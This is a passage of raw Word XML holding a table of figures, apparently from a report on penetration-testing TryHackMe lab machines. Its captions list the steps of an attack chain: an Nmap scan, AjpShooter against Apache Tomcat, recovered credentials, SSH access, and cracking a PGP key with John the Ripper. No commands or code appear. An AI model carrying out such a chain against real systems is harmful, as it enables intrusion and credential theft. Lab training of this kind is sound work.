          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="228FF2EB" w14:textId="7B007F65"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18" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 93: Examination of Directory Contents</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981818 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>93</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0766DAFF" w14:textId="54664AD4"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19" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 94: Flag 1 captured</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981819 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FEC0FE7" w14:textId="1CF39341"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20" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 95: Capture of Flag 2</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981820 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E2ACB49" w14:textId="038BF2FA"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21" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 96: Activate Virtual Machine Tomcat [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981821 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AC59C76" w14:textId="19CA5A3F"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22" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 97: Tomghost Directory and Readme File Created [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981822 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A105F45" w14:textId="070131C1"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23" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 98: Nmap [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981823 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31238C0B" w14:textId="14AE5FE8"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24" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 99: Apache Tomcat is running [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981824 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BC061C1" w14:textId="62A7846E"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25" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 100: Run AjpShooter [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981825 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E730832" w14:textId="6EFBA8A1"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26" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 101: AJP Shooter Run [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981826 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E0E5342" w14:textId="4022AA23"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27" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 102: the Username and Password is Returned [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981827 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>98</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="069CF6CD" w14:textId="66664921"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28" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 103: SSH into User and List Directory Contents [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981828 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>98</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EB4D8A2" w14:textId="7A971188"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29" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 104: SCP File Transfer [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981829 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AE7A79B" w14:textId="60E81306"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30" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 105: PGP Private Block Key [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981830 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7415963C" w14:textId="12AA9DEA"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31" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 106: The 'cat' command used on credential.pgp [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981831 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>100</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B316D16" w14:textId="5469F477"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32" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 107: Run JTR against tryhackme.asc [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981832 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>100</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3232D769" w14:textId="133560AA"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33" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 108: The key has been found [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981833 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>100</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="637E98B4" w14:textId="4324DD88"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34" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 109: Use the passphrase to import tryhackme [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981834 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>101</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AB52F20" w14:textId="38E27818"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35" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 110: Successful Import of TryHackMe [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981835 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>101</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63DD8A28" w14:textId="44FCE6CB"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36" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 111: Decrypt Credential.pgp [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981836 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>102</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="450A0ED3" w14:textId="621BA048"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37" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 112: SSH into User 'Merlin' [55]</w:t>
        </w:r>
